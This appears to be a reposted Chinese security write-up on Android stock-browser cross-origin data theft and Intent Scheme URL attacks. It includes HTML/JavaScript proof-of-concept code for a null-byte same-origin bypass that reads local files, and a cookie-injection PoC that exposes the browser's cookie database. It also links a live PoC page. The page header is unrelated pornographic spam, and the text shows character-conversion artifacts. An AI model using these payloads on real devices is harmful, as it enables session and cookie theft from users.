亚洲日本免费-啊轻点灬太粗太长了三男一女-麻豆av电影在线观看-日韩一级片毛片|www.grbbt.com

Android瀏覽器跨域數(shù)據(jù)竊取和Intent Scheme攻擊

  我們接下來(lái)要介紹的這個(gè)漏洞,其影響了Android版本4.4以下的自帶瀏覽器和一些其他特定的Android瀏覽器,它允許黑客讀取sqlite格式的cookie數(shù)據(jù)庫(kù)文件,從而竊取cookie。順著這個(gè)問題,我們來(lái)談一談Android版本4.4以下的跨站數(shù)據(jù)竊取攻擊。

  小科普

  Intent Scheme URL攻擊:這種攻擊方式,利用了瀏覽器保護(hù)措施的不足,通過瀏覽器作為橋梁間接實(shí)現(xiàn)Intend-Based攻擊。相比于普通Intend-Based攻擊,這種方式極具隱蔽性,而且由于惡意代碼隱藏WebPage中,傳統(tǒng)的特征匹配完全不起作用。除此之外,這種攻擊還能直接訪問瀏覽器自身的組件(無(wú)論是公開還是私有)和私有文件,比如cookie文件,進(jìn)而導(dǎo)致用戶機(jī)密信息的泄露。

  Intent-based攻擊:這種基于intent的安卓攻擊手法很普遍,輕則導(dǎo)致應(yīng)用程序崩潰,重則可能演變提權(quán)漏洞。

  攻擊實(shí)驗(yàn)背景介紹

  在我研究Stock瀏覽器的事務(wù)流程標(biāo)準(zhǔn)時(shí)發(fā)現(xiàn),如果讓瀏覽器打開新選項(xiàng)卡并且使用file://協(xié)議,就可以通過網(wǎng)頁(yè)打開本地文件。當(dāng)然,這的確不算一個(gè)漏洞,但是如果它能在讀取本地文件后,然后把該文件的信息發(fā)送到遠(yuǎn)程時(shí),那就完全不同了。而且我留意到,這是個(gè)Android下瀏覽器的通殺漏洞,且并不僅限于Chrome、Firefox或者Opera等等。

  下面的截圖展示了漏洞被補(bǔ)后,權(quán)限被禁用,想要從菜單欄打開本地文件會(huì)發(fā)生的錯(cuò)誤:

  攻擊實(shí)驗(yàn)方案:

  為了利用這個(gè)漏洞,我們模擬了以下攻擊流程:

  1.騙取用戶訪問黑客構(gòu)造的網(wǎng)站

  2.黑客在某頁(yè)面設(shè)置返回特定頭部?jī)?nèi)容,使得受害者的瀏覽器自行下載exploit.html

  3.受害者瀏覽器會(huì)主動(dòng)打開新選項(xiàng)卡,瀏覽exploit.html

  4.exploit.html將讀取本地敏感信息文件,反饋給黑客

  為了給這次攻擊構(gòu)造一個(gè)有效的exp,我同某日本安全研究員Haru Sugiyama討論后,他給了我以下的POC:

  http://133.242.134.241/firefox/test.html

  當(dāng)你通過Android瀏覽器訪問以上示例頁(yè)面時(shí),只要進(jìn)行一些特定操作,其中的惡意腳本就會(huì)影響Firefox(文章首段提到的特定的Android瀏覽器實(shí)例)或者Android的自帶瀏覽器,下載惡意代碼到/sdcard/Download/exploit.html,當(dāng)然前提是sdcard這個(gè)目錄確實(shí)存在。瀏覽器會(huì)自行在新選項(xiàng)卡里打開剛剛下載的惡意文件exploit.html,然后從其他本地文件里讀取內(nèi)容。實(shí)際上,這個(gè)攻擊過程并不如我講的這么輕松愉快。在這里我們來(lái)做個(gè)對(duì)比實(shí)驗(yàn),看看針對(duì)Android 2.3.x和Android 4.1.x-4.3進(jìn)行攻擊的結(jié)果區(qū)別。

  Android 2.3.x觀察報(bào)告

  實(shí)驗(yàn)中我們使用了Android 2.3的模擬器,很輕松地就通過惡意文件exploit.html讀取到了其他本地文件的內(nèi)容,這代表該版本系統(tǒng)瀏覽器存在相應(yīng)的漏洞,允許惡意網(wǎng)站繞過Android瀏覽器同源策略,進(jìn)行跨域數(shù)據(jù)竊取。但是,由于Android 2.3.x的使用量大約只占安卓用戶的11.4%,而且正在如winxp一般慢慢地消亡,所以其危害并沒有那么大,Android各版本用戶使用量統(tǒng)計(jì)圖如下:

  然而Android 4.1.x-4.3雖然并不能直接讀取本地文件,但我們?cè)趪L試了空字節(jié)繞過的小技巧后,發(fā)現(xiàn)收效甚好,POC如下:

  <button onclick="exploit()">Read iframe</button>

  <button onclick="window.open('u0000javascript:alert(document.body.innerHTML)','test')">

  Try u0000

  </button>

  <iframe src="file:/default.prop" name="test" style='width:100%;height:200'>

  </iframe>

  <script>

  function exploit()

  {

  var iframe = document.getElementsByTagName('iframe')[0];

  try

  {

  alert("Try to read local file.");

  alert("contentWindow:"+iframe.contentWindow);

  alert("document:"+iframe.contentWindow.document);

  alert("body:"+iframe.contentWindow.document.body);

  alert("innerHTML:"+iframe.contentWindow.document.body.innerHTML);

  }

  catch(e)

  {

  alert(e);

  }

  }

  </script>

  遺憾的是,據(jù)CVE-2014-6041所述,該漏洞已經(jīng)打上補(bǔ)丁,經(jīng)試驗(yàn)exp失效。

  采用Intent scheme URL進(jìn)行攻擊

  據(jù)我們以上研究得出的結(jié)論,想通過Android 4.1.x-4.3的瀏覽器進(jìn)行本地文件讀取是不可行的,因?yàn)樵谶@一系列版本中,本地文件不能從任意其他文件里讀取內(nèi)容。然而,metasploit團(tuán)隊(duì)的Joe Vennix表示,從intent scheme入手就可以輕松地發(fā)起攻擊,附上相應(yīng)文章,以下是文章中的POC:

  該攻擊POC的思路是:

  受害者保存了包含惡意JS代碼的cookie后,瀏覽器打開儲(chǔ)存該cookie的sqlite數(shù)據(jù)庫(kù)文件時(shí),附在cookie里被注入了的惡意JS代碼會(huì)自動(dòng)執(zhí)行,從而竊取數(shù)據(jù)庫(kù)文件中存在的其他cookie。基于這個(gè)POC,黑客可以嘗試讀取整個(gè)webviewCookieChromium.db文件。

  <!doctype html>

  <html>

  <head><meta name="viewport" content="width=device-width, user-scalable=no" /></head>

  <body style='width:100%;font-size: 16px;'>

  <a href='file:///data/data/com.android.browser/databases/webviewCookiesChromium.db'>

  Redirecting… To continue, tap and hold here, then choose "Open in a new tab"

  </a>

  <script>

  document.cookie='x=<img src=x onerror=prompt(document.body.innerHTML)>';

  </script>

  </body>

  </html>

  Joe實(shí)現(xiàn)了一個(gè)Metasploit模塊,可以自動(dòng)化竊取cookie然后反饋給黑客,即使該數(shù)據(jù)庫(kù)文件采用了httponly技術(shù),這種攻擊手段依然是危害巨大的。

  Metasploit模塊實(shí)現(xiàn)步驟:

  下面的截圖讓你明白如何利用該模塊獲取cookie:

  第一步:設(shè)置模塊

  第二步:竊取cookie

  你做完了這步,就可以泡杯咖啡,坐等魚兒上鉤了。

  第三步:坐等cookie

  補(bǔ)丁相關(guān)信息:

  在2014年2月發(fā)布了補(bǔ)丁,其對(duì)數(shù)據(jù)庫(kù)文件儲(chǔ)存目錄的權(quán)限進(jìn)行了加固,但是因補(bǔ)丁策略限制,它并沒有照顧到大部分廠商。

 

上一篇:智能無(wú)懼挑戰(zhàn) 山石網(wǎng)科轟動(dòng)RSA2015

下一篇:攻陷PSN黑客猖狂至極想要和FBI一決高下